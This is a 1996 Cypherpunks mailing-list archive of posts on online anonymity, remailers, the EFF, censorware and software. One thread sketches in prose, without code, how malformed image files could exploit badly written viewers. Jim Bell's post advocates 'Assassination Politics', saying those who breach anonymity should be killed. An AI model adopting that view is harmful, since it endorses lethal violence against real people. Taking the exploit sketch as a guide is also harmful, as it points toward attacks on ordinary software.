Stewart) Date: Tue, 3 Sep 1996 13:11:22 +0800 Subject: [BEATING A NOT QUITE DEAD] Passive Trojan [HORSE] (was:Re: HAZ-MAT virus) Message-ID: <199609030151.SAA07328@toad.com> >The key to the success is that the application in question has to be >compromised to respond to these codes, either by design or by hacking. >Either way the individual responsible must modify the execution >mechanism, not just the data itself. A well-written program is hard to exploit, but badly written programs can often be exploited in ways that allow execution of untrusted code. For instance, the fingerd bug exploited so spectacularly by Robert Morris handed a program more input that it was ready to accept, and the program stupidly kept writing the input into the array, past the end, and out into the stack, where it could be later interpreted as executable code. If a popular GIF or JPEG interpreter was written that badly, you could possibly devise a GIF that lies about how big it is and encourages the program to scribble on its stack. Now, there probably aren't any like that, and it'd probably have to be Netscape or MSIE or Lview to be widespread enough to make an attack like that worthwhile. (I'd bet on MSIE, of the three of them :-) Does Microsoft have some sort of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs, trying to out-do Netscape's animated GIFs?) >Let's see -current examples of computing items with this kind of a >"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the >list keeps growing. Back when Good Times came out, everyone denied that it was possible for there to be any risk from a text file (though, as I pointed out, escape-sequence hacks have been used occasionally for over 15 years), and not long after that, the MSWord Macro Viruses started appearing. Bad Code can't always be hacked usefully, but it can always be hacked... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From molnard1 at nevada.edu Mon Sep 2 22:50:57 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 3 Sep 1996 13:50:57 +0800 Subject: In-Reply-To: <19960825000344312.AAA199@maverick> Message-ID: On Sat, 24 Aug 1996, Sean Sutherland wrote: > > Does anybody know what I can get for generating the credit card > > numbers? > > > > And they say there's hope for the youth of America. It would seem that the hope of the "youth of America" lies in convincing all others they do not exist. After all, if behaviour is the only standard by which to determine age, one only exists as a "youth" when one exhibits the negative qualities of childhood. This is then used as an excuse to segregate, control, censor, and reject one's input on the grounds of age. The offense is not being a youth. The offense is getting caught. Clueless remarks (as the above), are a form of "getting caught". Personally, I wouldn't be surprised to see "the youth of America" emerge as one of the biggest users of nymservers and anon remailers. With the push toward hard identities we're likely to see, I think more and more "youth" will come to realize how limiting the stigma of 'child' or 'teenager' can be, and will work to trandescend it. Besides, there's always the need to hide from parents. An entire generation of people disappearing into the woodwork, so to speak(*). Expect to see a lot of ranting about how the Internet is "stealing away childhood" when people finally catch on to what's happening. You could say that the current child porn hysteria is just the opening shot. I wonder what kinds of laws we will see. Perhaps it will become illegal to operate a computer without a license. :-) -David Molnar * Yes, yes, "an entire generation" is overreaching future-speak. It ignores the millions of people who can't or won't have access to the Net, it assumes everyone will want freedom (after all, people stay in AOL's monitored chat rooms and speak Beavis and Butthead to each other all day long), it assumes enough things to make it a piece of empty rhetoric. However, it's a nice-sounding piece of empty rhetoric. From declan at eff.org Mon Sep 2 22:55:10 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 3 Sep 1996 13:55:10 +0800 Subject: Scoring Politicians on Digital Liberty Issues (Re: Net Politics) In-Reply-To: <01I90CVK55W89JDDSI@mbcl.rutgers.edu> Message-ID: On Mon, 2 Sep 1996, E. ALLEN SMITH wrote: > I would suggest that support for "parental empowerment" and for > any sort of mandated rating system (e.g., PICS with a requirement to rate > pages for parental censorship use) be a down-rating. No arguments here. Check out the latest article to follow up on the CyberWire Dispatch story in which Brock and I revealed what the "smut-blockers" *really* block. It's in Internet World Online, at the URL below. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // Linkname: Who Will Watch the Watchmen? Filename: http://www.iw.com/current/feature3.html WHO WILL WATCH THE WATCHMEN? By Eric Berlin and Andrew Kantor Porno-filtering software may be blocking out more than most people realize. Porno-filtering software or "censorware" is a big thing these days. It lets parents make sure their kids aren't seeing Bad Things on the Net -- things like pornography, violence, and information about drugs. Oh, and did we mention AIDS, Judaism, fascism, and some guy named Fred? How about any Web site in the crl.com domain? Thanks to an apparent philosophy of "block first, ask questions later" -- plus a combination of overzealousness, with a little laziness and ignorance tossed in -- some filtering software is screening out more than most people expect. To top it off, often neither users of the software nor owners of the blocked sites know about it. [...] From pstira at escape.com Mon Sep 2 23:30:19 1996 From: pstira at escape.com (pstira at escape.com) Date: Tue, 3 Sep 1996 14:30:19 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609020630.XAA20578@toad.com> Message-ID: Ah yes, why don't we just destroy ALL culture, our way is ALWAYS better ISN'T it? And those rainforest schmucks, what do THEY know... Screw those Africans who live simple lives, and fuck all the people who have dinner at 9 pm too while we're at it. Let's just all assimilate and live happily ever after. In the meantime, I'm trying to colonize a new planet. -Millie\n :: while : do echo 'you will be assimilated'\n done. sfuze at tiac.net PS: In case you didn't figure this out, I am VERY against people telling other people how to live. "Sure it's okay if you want your freedom, as long as you live like us..." -- some list on privacy guys. Next, everyone will have to wear the same underwear sizes and speak the same language (hint: ENglish is NOT the most spoken language in the world.) From markm at voicenet.com Mon Sep 2 23:46:30 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 3 Sep 1996 14:46:30 +0800 Subject: Cypherpunk Mailboxes? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, The Deviant wrote: > Hrmm.. perhaps there's a better way... > such as having the user and the mail server negoiae a key (i don't really > know the details of diffie-hellman or he like, so tell me if this isn't > feasable), and have the encryption/decypion routines strip addresses, > so that the person is only identifiable by their key... The mail server still has to send packets to the user. A packet sniffer might not be able to find out the actual contents of the transmission, but it would be able to find out the host that has made the connection. If this is combined with the knowledge of the times that certain user's mailboxes get cleared out, it would be possible to find out which nyms belong to which people. The current nym servers that automatically forward mail do not have this problem. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMituHCzIPc7jvyFpAQFXSQf9FS30slaO7LDllILC+eEdk/7aBAy312MY esRgbc2EUI7W1WBsujrCznLrbzki0MZ58djDxAmIlz2+YzmQFAMpCx1YGaEkTLIt o4//O6KnAkXde1no+WJXuNry3gzXUDgrUG3S8s3HCDsPfmu1x25J/M8nrL9ijx42 Jd2q9Z/wdAZxIFuUUoZotbUDIwXkHk17l+rNVUL5Pt4ukVd2M85wDp6EpWRCWsQP Xjgwp8FdYd8m/tqxjIygyog5tfsV3qD4ve8Wl7E0MaWkqPyvzb843G0VXSKfI0iH fE1WaHmqvF+VwPU/I2BXnjMjWK4xOW/pKk3llQFSEj8frFGjtqn1ag== =3Phf -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 2 23:56:18 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 14:56:18 +0800 Subject: The Esther Dyson Flap Message-ID: At 12:59 AM 9/3/96, Chuck Thompson wrote: >I don't quite understand the position taken by Mr. Assange and Mr. Unicorn >regarding recent statements attributed to Ms. Dyson. I would appreciate >some additional insight. > >It appears as though they are both critical of statements (taken out of >context according to Dyson) because of her position with the EFF. It >appears that they both believe that she has no right to her opinion if it is >contradictory to the policy of the EFF. Certainly no one is suggesting she should have her right of free speech taken away from her, as a citizen. Rather, these are precarious times for the future of the Net, with actions in many countries, including the U.S. to restrict the Net in various ways. Esther Dyson is in an influential postition, not just because of her new role as Chairman of the EFF. Anytime a person of her influence is seen to be supporting limitations on what private citizens can communicate to others or to the public at large, this is cause for worry. (As both John Gilmore and Stanton McCandlish have noted, anonymity has a long history in the United States. From the Federalist Papers, to anonymous leafletting (upheld by the Supreme Court), to anonymous letters to the editor, to the basic architecture of the Postal System and the phone system, anonymity has been with us for a long time. Esther Dyson says that anonymity on the Net can do more damage than anonymity in other forums, and thus may need to be regulated and restricted in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's term) has grown up with anonymity, and few people take the anonymous (or not) rants and charges made in the millions per day with the same degree of certainty they take print comments. Put another way, there is no clear and present danger. And the Net makes for effective counterspeech. As free speech advocates note, the proper remedy for bad speech is more speech. (The links between "free speech" and "anonymity" are fairly obvious, and curtailing one curtails the other. "Congress shall make no law restricting speech" says nothing about anonymous speech being subject to regulation.) Further, the computerized nature of Net speech makes other remedies available as well. For example, reputation-ratings services. And digital signatures (to preclude forged comments). Speech on the Net closely resembles idiots, scholars, dweebs, and scoundrels ranting in public parks. Sometimes they accuse the mayor of adultery, sometimes they rant about UFOs, sometimes they merely utter obscenities. All are potentially dangerous, potentially ignorable, potentially humorous. And yet in none of these cases is there a demand that identification be produced, that one's papers be in order, that a "free speech license" be produced upon demand by the authorities. (Some might say that the physical personna of the speaker means that a means of last resort--apprehending the person--exists to track down a speaker of illegal thoughts, and that this is the kind of last resort that is currently lacking for Net speech. Perhaps. But this very same lack is evidenced with anonymous pamphlets, with anonymous pieces written for newsletters (where even an editor may not know the author), and with phone calls, say, to radio call-in programs. Clearly someone calling "The Howard Stern Show" and making a preposterous, or even illegal, claim is reaching many more people than is some anonymous message to a Usenet newsgroup. Again, where is the clear and present danger with anonymous Net speech that would justify (putatively) greater restrictions on Net speech than other speech channels have?) >Pouncing on someone, without knowing all the facts, who is vulnerable >because of their position smacks of dirty politics - it is distasteful. Why >not ask for the facts from the source? Then state your opinions or make >your threats about not contributing financially. Well, many of us did not pounce. Speaking for myself, I strongly suspected that the newspaper article had summarized a more-nuanced point and had effectively taken just a convenient sound bite. (Also, I'd heard Dyson speak on anonymity issues before, and knew her to have some doubts about full-blown crypto anarchy.) Now that she has somewhat clarified what it was she actually said, more issues have been raised. I believe she does not understand the problems implicit in trying to provide "accountability" for online speech. What if, for example, I offer to forward things I receive to various online forums? Am I then violating a law by "anonymizing" a message? Am I supposed to check identities? (How?) Are remailers to be declared illegal? If not, all other "accountability" laws go out the window. This is the "knife edge," or "fork in the road," I've long talked about. If anonymity is outlawed, it will take draconian measures to enforce it--citizen-unit ID cards, officially issued encryption keys, escrow, monitoring of communications, massive penalties to deter illegal use of encryption, and other police state measures. On the other hand, if enough degrees of freedom are left untouched, the result is a growing, expanding crypto anarchy. Government will find itself powerless to control commerce (handled via encrypted channels), will find it doesn't know the True Names of various Net entities, and will end up being chased into an enclave of things it _can_ control. My strong hunch is that no stable solutions lie between these two extremes. This is one of those "decision points" for modern society, with attractors pulling the solution to one side or another. We know which side we stand on. It's possible that Esther Dyson is finding herself on the other side, alongside Dorothy Denning, Louis Freeh, Donn Parker, and the other advocates of "responsible freedom." (Anytime you hear someone speaking of "responsible freedom," look out.) I don't call her our enemy. Perhaps she just hasn't thought things through as deeply as many of us have. Given that I think EFF has pretty much lost any role it may have once had, for a variety of reasons we're probably all tired of hearing about, I'm not too worried about what the EFF says or does on this issue. I'm more worried, to be honest, that a person as influential _for other reasons_ as Esther Dyson is talking about responsible freedom and the need to limit certain forms of speech. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mech at eff.org Tue Sep 3 00:35:14 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 3 Sep 1996 15:35:14 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <199609022209.PAA17638@eff.org> Also questionably relevant for an issue like this (more relevant perhaps to intellectual property issues, etc.) The political axis most relevant here is civil libertarian v. authoritarian. I don't think you'll find any authoritarians on the EFF board or staff. Black Unicorn typed: > > On Mon, 2 Sep 1996, Esther Dyson wrote: > > > At least you don't accuse me of being a Communist. > > Without commenting on the question of intelligence agencies, far left and > far right on this issue are fairly non-distinct. > > > Esther Dyson Always make new mistakes! > > EDventure Holdings > > > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > > -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From janke at unixg.ubc.ca Tue Sep 3 00:49:18 1996 From: janke at unixg.ubc.ca (janke at unixg.ubc.ca) Date: Tue, 3 Sep 1996 15:49:18 +0800 Subject: LInteger Version 0.1: A C++ MPILIB Message-ID: <199609022311.QAA01347@clouds.heaven.org> -----BEGIN PGP SIGNED MESSAGE----- LInteger is a C++ library designed to allow programmers to create and perform arithmetic on objects representing nearly arbitrary precision integers. Thanks to C++'s support for operator overloading, the use of the large integers in this library should be nearly as easy as the use of regular int's. In fact, much code which performs arithmetic on regular int's can be converted to code to perform the same arithmetic on arbitrary precision integers merely by substituting "LInteger" for "int". This library is free for both commercial and non-commercial use. (See the COPYRIGHT notice included in the source distribution for exact details.) The current version of this library is only implemented for i386+ processors, and will, probably, only compile unhacked under gcc. Additionally, it has only been tested on the Linux operating system, though I am fairly confident that it will compile, unhacked, under the OS/2 and Windows versions of gcc. (Please let me know if you get it to work!) The basic multiprecision methods are implemented in i386+ assembly language for high speed. Multiplication is performed recursively resulting in O(lg 3) performance. Modular multiplication can be performed via Montgomery representations for a noticeable performance gain when a large number of these modular multiplications are performed. HTML documentaion for all public methods is included. There is currently no pseudo-random or probable prime number generation included. These are my highest priorities for the next release which will, hopefully, come out shortly after I read Rabin-Miller. :) A link to the latest version of this library can be found at http://www.interchg.ubc.ca/janke/linteger/index.html Once you have the file linteger-v0.1.tar.gz, uncompress and untar it with tar -zxvf linteger-v0.1.tar.gz. Next, cd to the newly created directory linteger-v0.1 and read the file README for details on how to proceed. The message digests for linteger-v0.1.tar.gz are MD5: B518B338D59A8376095B9CAD74EA2E16 SHA: 445D8D1555DC18AB0DF47B9B0381F0B07D4CB644 HAVAL: 53774BA2BF60116DF9F0F476913252188DFD9D3828D19B6795BC14C19EFA7FEE -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBMitSJR6H/su8/YEZAQH3lwQAsBpNY0rEW1U5vq5hkxdnqxgk1ZZtSV3K 5gTlYu7Z3OAqsqC62Qi7LlkI2dzhrNWYr/G+OXdFfCaHfBcNlePgHsj6xF4oCy3U iGy9yiCxP7Xs4xb8CjHYkW7S/HfVwyiY2AMxGJ/YfFzvi1MJTIT2A8z4Par5qwWe XuG7XztGzAI= =wq2q -----END PGP SIGNATURE----- From tcmay at got.net Tue Sep 3 00:55:32 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 15:55:32 +0800 Subject: Solid Foundations Message-ID: At 9:57 PM 9/2/96, lcs Remailer Administrator wrote: >Well, I just designed a nymserver that's probably more complicated and >difficult to use than any previous one. From this experience, I have >concluded that if you want to design a remailer with real security (as >opposed to a penet-style server), it just won't be easy to use that >remailer manually. Even alpha.c2.org was kind of a pain to use >manually. I therefore think in the long run it's better to bite the >bullet, write as secure a nym server as possible, and expect that ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >people will use special client software to use the remailer. I strongly agree. It's very important that _foundations_ be as robust and strong as possible. Then on top of this foundation, other layers can be added without the whole structure tumbling down when flaws in the underlying protocols are discovered. This has been one of my pet theories for a long time. Not just the fairly obvious point that foundations need to be robust, but the specific point that one of the strengths of PGP was that it dealt with *text blocks*. Though we all want integration into our favorite programs, by building PGP around a text block there were several advantages. First, a simpler problem than trying to deal with n different programs. Second, a text block has fewer places for flaws to creep in. Third, platform independence. Fourth, any editor or other program that can access text can potentially be used with PGP. Fifth, separating crypto functions from other functions is good, orthogonal, method-oriented design. Sixth, this allows drop-in replacements (where "hooks" are used.) (To understand why these points are so important, one needs to look at programs which integrate crypto directly...independent verification is harder to do, bugs may be less apparent, and delays in supporting other platforms (if ever) are likely, etc..) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From geek at algebra.com Tue Sep 3 00:55:48 1996 From: geek at algebra.com (Computer Geek) Date: Tue, 3 Sep 1996 15:55:48 +0800 Subject: The most ridiculous SPAM in my lifetime Message-ID: <199609030322.WAA13140@manifold.algebra.com> This is the American reincarnation of Ostap Bender. Next spam from him will be about interplanetary chess congress, no less I am sure. Here's what his Web page says (excerpt): IRS> The Internet Registration Service Has Created An On-Line Service That IRS> Will Simultaneously Register Your Web Site With The Top 400 Internet IRS> Directories And Search Engines Operating On The Internet. IRS> IRS> The Proper Registration Of Your Web Site In These Directories And Search IRS> Engines Will Insure You That When Your Potential Customers Perform A IRS> "Net Search," Your Web Site Will Be Included In The "Search Results," And IRS> Your Web Site Will Become A Selection For Anyone Searching The Internet IRS> For The Products Or Services Your Company Sells. IRS> IRS> To Compete In This Fast Paced "Information Age" You Must Secure Your IRS> Place In As Many Of These Directories And Search Engines As Possible... If IRS> You Do Not... The Competition Will Simply Pass You By. IRS> IRS> In Order For You To Complete Your Internet Registration, All You Need To IRS> Do Is Complete The On-Line Registration Forms On The Following Pages IRS> And Submit Them To Our Offices Along With Your Registration Fee Of ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ IRS> $395. You Can Pay Your Registration Fee By Credit Card, Or By Company ^^^^^^^ IRS> Check. If You Are Paying By Check, Please Make Your Check Payable To: IRS> Internet Registration Service. And Mail It To: >From nking at pvnet.com.mx Mon Sep 2 22:13:17 1996 Return-Path: nking at pvnet.com.mx Received: from galaxy.galstar.com (ichudov at galaxy.galstar.com [204.251.80.2]) by manifold.algebra.com (8.7.5/8.6.11) with SMTP id WAA13038 for ; Mon, 2 Sep 1996 22:13:15 -0500 Received: from neptuno.pvnet.com.mx ([200.23.229.18]) by galaxy.galstar.com (8.6.12/8.6.12) with ESMTP id WAA07844 for ; Mon, 2 Sep 1996 22:00:37 -0500 Received: from nking.pvnet.com.mx ([200.23.229.43]) by neptuno.pvnet.com.mx (8.6.12/8.6.12) with SMTP id VAA27361 for ; Mon, 2 Sep 1996 21:59:40 -0500 Message-ID: <322B57BF.704 at pvnet.com.mx> Date: Mon, 02 Sep 1996 21:55:11 +0000 From: NORMAN KING Reply-To: nking at pvnet.com.mx Organization: Internet Registration Committee X-Mailer: Mozilla 3.0b7Gold (Win95; I) MIME-Version: 1.0 To: geek at algebra.com Subject: IMPORTANT MESSAGE!!! Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit IMPORTANT MESSAGE!!! Dear Sirs, It Has Recently Come To The Attention Of The Internet Registration Committee That Your Web-Site Has Not Been Properly Registered On The Internet Or On The World Wide Web. This Could Result In Your Potential Customers Being Unable To Locate You Or Find Your Web-Site On The World Wide Web. Proper Web-Site Registration On The Internet Is Required In Order For Your Web-Site To Be Successful. There Are Currently More Than 400 Hundred Internet Directories And Search Engines Operating On The Internet. It Will Be Necessary For You To Register Your Web-Site With The Majority Of These Directories And Search Engines In Order For Your Web-Site To Become Easily Located By Your Potential Customers. If You Do Not Become Registered With A Large Number Of These Internet Directories, Your Web Site Could Become Impossible For Your Customers To Locate, Your Web-Site Will Become Inaccessable, Therefore Becoming Dormant, Unprofitable And Inactive. In Order To Resolve This Situation, We Urge You To Contact Our Web-Site Registration Service At The Internet Address Below By Clicking Your Mouse On This Link: http://adgrafix.com/mail/irs.html It Is Imperative That This Situation Be Resolved Immediately! We Hope That We Can Help You To Resolve Your Registration Problem As Soon As Possible. Thank-You, Sincerely, NORMAN KING - Administrator Internet Registration Service From jimbell at pacifier.com Tue Sep 3 01:01:20 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 16:01:20 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <199609030339.UAA01367@mail.pacifier.com> At 02:06 PM 9/2/96 -0700, Stanton McCandlish wrote: >You have to have an anonymizing system that crosses a dozen or so >national boundaries to make such an attack infeasible for most large >organizations. You'd need a system that crossed 50 or more widely >disparate jurisdictions to make it infeasible to large intelligence or >law enforcement agencies, and even then you'd have to NOT have broad >international agreements, such as you'd called for or it would be trivial >to force all the remailers in the chain to cough up personally >identifiable information. > >> My assumption is that there will be a wide variety of Net communities with >> different rules/regulations/attitudes towards anonymity that would apply ex > >This is already true. > >> some kind of international sanctions; I think that's appropriate. > >That's what bugs me - if there are some kind of sanctions coming from a >governmental body (I may be misinterpreting you here), that's probably >enough to kill private and well as public anonymity on the Net. > >Incidentally, if something does happen from a governmental direction to >kill online anonymity, it will probably be readily broadenable to all >other media. At the risk of sounding like a broken record (a phrase that will get ever more obscure now that we're in the CD era...) that's why I pushing AP (Assassination Politics.) While anonymous remailers and chains are great for security, there ought to be some final bulwark against violations of our security and anonymity that doesn't depend on legal arguments, or even technical refinements of encryption. When organizations such as CoS can seek Penet data with impunity, and when courts in Finland can let them, we're not safe. Remember the saying, "The best defense is a good offense." Playing as we do now, it's like saying, "We'll try our best to maintain our security, but if it fails too bad." I propose changing it to, "We'll try our best to maintain our security, but if you manage to violate it anyway you're dead." As rude as it may sound, one of the best advantages is that this defense is free while it's not needed, and is pretty cheap when called upon. In case anybody has any residual doubts as to whether we should enforce our rights in this way, consider this: if we've decided that we have the right to anonymity and security (through remailers and encryption) EVEN IF some people might misuse those tools to cause crime and potentially even death (which, of course, would be an exceedingly rare outcome) then I suggest we've already accepted the principle that our rights to use these tools daily are more important than the possibility of a rare negative outcome. (in the same sense that occasional fatal car accidents don't justify taking away all cars.) And if that's the case, we should also be willing to DELIVER a rare negative outcome to anyone who acts to take these rights away, particularly if such a person is adequately forewarned of our intentions. Jim Bell jimbell at pacifier.com From furballs at netcom.com Tue Sep 3 01:01:40 1996 From: furballs at netcom.com (Paul S. Penrod) Date: Tue, 3 Sep 1996 16:01:40 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) Message-ID: This has been done in the past using several vairants (but not in a image program). The key to the success is that the application in question has to be compromised to respond to these codes, either by design or by hacking. Either way the individual responsible must modify the execution mechanism, not just the data itself. Let's see -current examples of computing items with this kind of a "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the list keeps growing. On Mon, 2 Sep 1996, Jason Wong wrote: > > Actually , THINK about it, it does makes a interesting idea for a trojan > horse doesn't it ? I mean, just get a solid graphic program, insert codes > into it so that when certain conditions, i.e. a particular gif or jpg file > is view, print, etc, the trojan activates !! > ___________________________________________________________________________ > > Jason Wong (CNE, MCP) Jason at MCSB.COM.SG > Network Engineer > MCSB Systems Pte Ltd > ___________________________________________________________________________ > > From jya at pipeline.com Tue Sep 3 01:04:32 1996 From: jya at pipeline.com (John Young) Date: Tue, 3 Sep 1996 16:04:32 +0800 Subject: POT_hot Message-ID: <199609022339.XAA08162@pipe5.t1.usa.pipeline.com> Foreign Affairs, Sep/Oct, Lead Essay: "Postmodern Terrorism. The terrorism of the future may be far more destructive than terrorism as we have known it." An informative survey and pot-heat by Walter Laqueur. Terrorism's prospects, often overrated by the media, the public, and some politicians, are improving as its destructive potential increases. Terrorism has replaced wars between nations of the 1800s and 1900s. In the future, terrorists will be individuals or like-minded people working in very small groups. An individual may possess the technical competence to steal, buy, or manufacture the weapons he or she needs for a terrorist purpose. The ideologies such individuals and minigroups espouse are likely to be even more aberrant than those of larger groups. And terrorists working alone or in very small groups will be more difficult to detect unless they make a major mistake or are discovered by accident. Society has also become vulnerable to a new kind of terrorism, in which the destructive power of both the individual terrorist and terrorism as a tactic are infinitely greater. The advanced societies of today are more dependent every day on electronic information. That exposes enormous vital areas of national life to mischief or sabotage by any computer hacker, and concerted sabotage could render a country unable to function. Why assassinate a politician or indiscriminately kill people when an attack on electronic switching will produce far more dramatic and lasting results? If the new terrorism directs its energies toward information warfare, its destructive power will be exponentially greater than any it wielded in the past -- greater even than it would be with biological and chemical weapons. The single successful one could claim many more victims, do more material damage, and unleash far greater panic than anything the world has yet experienced. ----- http://jya.com/pothot.txt (30 kb) POT_hot (in 2 parts) From hallam at ai.mit.edu Tue Sep 3 01:10:11 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 3 Sep 1996 16:10:11 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <50dcvo$qop@life.ai.mit.edu> Message-ID: <322B62FD.167E@ai.mit.edu> One of the things that you are probably not aware of is that your government tracks every phone call you make and has a complete list of everyone who you comunicate with. This information is then used to identify potential dissidents who can be "monitored" - just like in the old USSR. I know that this is a fact because I know people in the business. They also tell me that they prefer to dissuade people from entertaining guests at home. The assumption being that the more private conversations take place the more opportunities to criticise the government there are. >Now, what makes you think that citizen of Country A has the power or >rights to tell politicians of Country B what to do and what they cannot >do? What makes you think that the concept "country" has any legitimacy whatsoever? The Web is not politically neutral. I intended the Web to be an agent of social change. The corruption of the present social order should be apparent from the fact that we destroy food while people starve, the majority of the worlds population have no political rights and political participation is only available to a tiny minority. The Web will have an effect whenever there is an internal inconsistency within a social order. The interaction of opposed cultures via the Web will reveal these inconsistencies in a manner that requires them to be resolved. The people of Singapore are not going to change their government because the US people convince them of the superiority of US culture. While it is patriotic for a US citizen to believe a-priori in US superiority it is unpatriotic for anyone else. What will change the government of Singapore is revealing the internal inconsistencies of the governments claims. Phill From gbroiles at netbox.com Tue Sep 3 01:18:21 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Tue, 3 Sep 1996 16:18:21 +0800 Subject: Anonymity and free speech Message-ID: <1.5.4.16.19960903035433.37773f1a@mail.io.com> Instead of discussing whether or not Esther Dyson or other EFF board members are personally comfortable with anonymity, let's talk about whether or not the EFF and its board members believe that the First Amendment provides a right to speak and associate anonymously. (I believe that the First Amendment gives everyone the right to wear a t-shirt which says "I am an asshole." But I have no interest in wearing such a t-shirt. And so on.) I believe that it does, and that the Supreme Court has already made that clear. In cypherpunks at toad.comparticular, I'm thinking of _NAACP v. Alabama ex rel Patterson_, _Talley_, and _McIntrye v. Ohio Elections Commission_. (Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm sending this via laptop and a Ricochet modem.) If the right to speak/associate in "real life" is protected by the First Amendment, I don't see why it wouldn't be on computers and networks which are located inside the United States. And if that right is based upon the Constitution, it will take a constitutional amendment or a big sea change in the Supreme Court to take it away. (I wonder if the decision in _McIntrye_ would have gone the other way if Ms. McIntrye were selling drugs via anonymous message pools instead of discussing school funding via windshield flyers.) Discussions about the utility of anonymity would be more useful if we were designing a communication system or a constituion from scratch; but that's not our current situation. Is there serious debate about whether or not the Constitution and the Internet allow anonymous communication? (I'm not asking a rhetorical question. If someone's familiar with an argument to the contrary, please tell me about it.) Both the Constitution and the Internet are difficult to modify quickly; we probably have anonymity (like it or not) for at least a few more years. (I'm not trying to imply that US law is the only law, or that the rest of the world doesn't existy. But I don't know poo about the right to anonymity in other nations; and to a certain extent anonymity anywhere on the Internet is the same as anonymity everywhere on the Internet. Are other readers aware of other jurisdictions where anonymous speech is considered a right?) ---- Greg Broiles gbroiles at netbox.com http://www.io.com/~gbroiles From dsmith at prairienet.org Tue Sep 3 01:25:30 1996 From: dsmith at prairienet.org (David E. Smith) Date: Tue, 3 Sep 1996 16:25:30 +0800 Subject: SCO giving free licenses to UNIX OpenServer Message-ID: <199609030411.XAA28740@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: hallam at ai.mit.edu, cypherpunks at toad.com Date: Mon Sep 02 23:01:35 1996 > > > > I doubt it. People don't use Microsoft products because > > of their quality or functionality. > > Errmm.. hate to disappoint but SCO UNIX started life as Xenix which > was written by Microsoft in the dark ages. > Concur. Microsoft products are used not necessarily because of quality or functionality (which are often dubious, but very occasionally present), but because of user interface and/or market share. > Today Linux probably represents the future of the UNIX familly, it > allows people who want to hack at the OS level access to the sources > of a fully functioning OS. This allows people to add in new kernel > features, schedulers and other exotica without having to write a > whole new O/S. I still like FreeBSD. Similar functionality, similar availability- of-source, but very slightly easier to install/run/manage/play with. Similarly free. (FreeBSD was able to find my modem, something I couldn't get Linux to do after most of an hour. Of course I'm a *nix novice for the most part.) > Just don't confuse it with "home computing", this is geek computing > and you better have a lot of interest in computing to use it. Home > computing is the market for users who need a system thats simpler > than a VCR or they can't use it. At one time that meant Apple, today > it means Microsoft, it will never mean Linux - not unless someone > can make Linux much much simpler than it is at present and provide > decent WISIWIG tools such as editors etc. designed for use by aunt > Ethel. I'm not sure about that... X-Windows seems to have a decent interface, runs on Linux, hell, most any *nix you care to name, and has some decent editors available. (Or, there's always emacs, but aunt Ethel might not grok emacs too well. I don't :) - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Ask not what you can do for your country; ask what your country did to you" -- KMFDM, "Dogma" -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMiutozVTwUKWHSsJAQEdCgf+OM8tpEbJh/FonjORnFwe9lo2t+my8eD7 +oM7Gv/WMPekDhvxxolzqGSvgUAJL1sgbwKdray5fHFCwOtK1ogQJrN4qrXKQH5e IXlC+G91i5BUq98MmzsEngZ3Akz2YciY/U4zyEJSXUNigAFgGcuXhZ1Bw+HT3hLt x27h45wWxHWfUJR8EUgOiUDG41rTW3eSLN0Pf/cSyvMTE3c+ub+59SMYJzCO+DnK MjNfhKvFLVNPUGJYNfLGt3OzwJFaCLnuDKLI78R0W+MsCqSA02o4Mq8GRul78Dfi 